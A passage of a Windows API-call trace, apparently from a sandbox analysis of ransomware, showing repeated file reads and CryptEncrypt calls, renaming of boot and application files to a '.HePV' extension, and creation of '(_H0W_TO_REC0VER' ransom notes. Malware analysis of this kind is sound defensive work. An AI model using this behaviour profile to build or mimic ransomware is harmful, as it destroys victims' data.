lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.513] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.513] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.513] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.513] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.514] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.514] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.514] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.514] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.514] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.514] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.516] CloseHandle (hObject=0xb8) returned 1 [0045.517] CloseHandle (hObject=0xc4) returned 1 [0045.518] GetCurrentThreadId () returned 0xa48 [0045.518] GetCurrentThreadId () returned 0xa48 [0045.518] MoveFileW (lpExistingFileName="c:\\boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="c:\\boot\\BOOTSTAT.DAT.HePV" (normalized: "c:\\boot\\bootstat.dat.hepv")) returned 1 [0045.518] CreateFileW (lpFileName="c:\\boot\\(_H0W_TO_REC0VER_HePV.txt" (normalized: "c:\\boot\\(_h0w_to_rec0ver_hepv.txt"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.520] CloseHandle (hObject=0xc4) returned 1 [0045.520] CreateFileW (lpFileName="c:\\boot\\(_H0W_TO_REC0VER_HePV.html" (normalized: "c:\\boot\\(_h0w_to_rec0ver_hepv.html"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.522] CloseHandle (hObject=0xc4) returned 1 [0045.522] CreateFileW (lpFileName="c:\\boot\\(_H0W_TO_REC0VER_HePV.url" (normalized: "c:\\boot\\(_h0w_to_rec0ver_hepv.url"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.524] CloseHandle (hObject=0xc4) returned 1 [0045.524] CreateFileW (lpFileName="c:\\boot\\cs-cz\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.524] CreateFileW (lpFileName="c:\\boot\\cs-cz\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.524] CloseHandle (hObject=0xc4) returned 1 [0045.524] CloseHandle (hObject=0xffffffff) returned 0 [0045.524] CreateFileW (lpFileName="c:\\boot\\cs-cz\\(_H0W_TO_REC0VER_HePV.txt" (normalized: "c:\\boot\\cs-cz\\(_h0w_to_rec0ver_hepv.txt"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.526] CloseHandle (hObject=0xc4) returned 1 [0045.526] CreateFileW (lpFileName="c:\\boot\\cs-cz\\(_H0W_TO_REC0VER_HePV.html" (normalized: "c:\\boot\\cs-cz\\(_h0w_to_rec0ver_hepv.html"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.580] CloseHandle (hObject=0xc4) returned 1 [0045.580] CreateFileW (lpFileName="c:\\boot\\cs-cz\\(_H0W_TO_REC0VER_HePV.url" (normalized: "c:\\boot\\cs-cz\\(_h0w_to_rec0ver_hepv.url"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.582] CloseHandle (hObject=0xc4) returned 1 [0045.582] CreateFileW (lpFileName="c:\\boot\\da-dk\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.583] CreateFileW (lpFileName="c:\\boot\\da-dk\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.583] CloseHandle (hObject=0xc4) returned 1 [0045.583] CloseHandle (hObject=0xffffffff) returned 0 [0045.583] CreateFileW (lpFileName="c:\\boot\\da-dk\\(_H0W_TO_REC0VER_HePV.txt" (normalized: "c:\\boot\\da-dk\\(_h0w_to_rec0ver_hepv.txt"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc4 [0045.585] CloseHandle (hObject=0xc4) returned 1 [0045.585] CreateFileW (lpFileName="c:\\boot\\da-dk\\(_H0W_TO_REC0VER_HePV.html" (normalized: "c:\\boot\\da-dk\\(_h0w_to_rec0ver_hepv.html"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe0 [0045.594] CloseHandle (hObject=0xe0) returned 1 [0045.595] CreateFileW (lpFileName="c:\\boot\\da-dk\\(_H0W_TO_REC0VER_HePV.url" (normalized: "c:\\boot\\da-dk\\(_h0w_to_rec0ver_hepv.url"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe0 [0045.596] CloseHandle (hObject=0xe0) returned 1 [0045.597] CreateFileW (lpFileName="c:\\boot\\de-de\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe0 [0045.597] CreateFileW (lpFileName="c:\\boot\\de-de\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.597] CloseHandle (hObject=0xe0) returned 1 [0045.597] CloseHandle (hObject=0xffffffff) returned 0 [0045.597] CreateFileW (lpFileName="c:\\boot\\de-de\\(_H0W_TO_REC0VER_HePV.txt" (normalized: "c:\\boot\\de-de\\(_h0w_to_rec0ver_hepv.txt"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe0 [0045.599] CloseHandle (hObject=0xe0) returned 1 [0045.599] CreateFileW (lpFileName="c:\\boot\\de-de\\(_H0W_TO_REC0VER_HePV.html" (normalized: "c:\\boot\\de-de\\(_h0w_to_rec0ver_hepv.html"), dwDesiredAccess=0x2, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0045.811] CreateFileW (lpFileName="c:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0045.811] CreateFileW (lpFileName="c:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0045.811] CloseHandle (hObject=0xd4) returned 1 [0045.811] CloseHandle (hObject=0xffffffff) returned 0 [0045.812] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.813] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.814] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.814] ReadFile (in: hFile=0xd4, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x24, lpOverlapped=0x0) returned 1 [0045.814] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x24, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x30) returned 1 [0045.814] WriteFile (in: hFile=0xd8, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x30, lpOverlapped=0x0) returned 1 [0045.814] CloseHandle (hObject=0xd4) returned 1 [0045.814] CloseHandle (hObject=0xd8) returned 1 [0045.814] GetCurrentThreadId () returned 0xa48 [0045.814] GetCurrentThreadId () returned 0xa48 [0045.814] MoveFileW (lpExistingFileName="c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.HePV" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.hepv")) returned 1 [0045.832] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0045.832] CreateFileW (lpFileName="c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0045.832] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.852] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.852] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.852] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.852] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.852] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.853] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.853] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.853] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.853] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.853] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.853] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.853] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.854] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.854] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.854] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.854] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.854] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.854] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 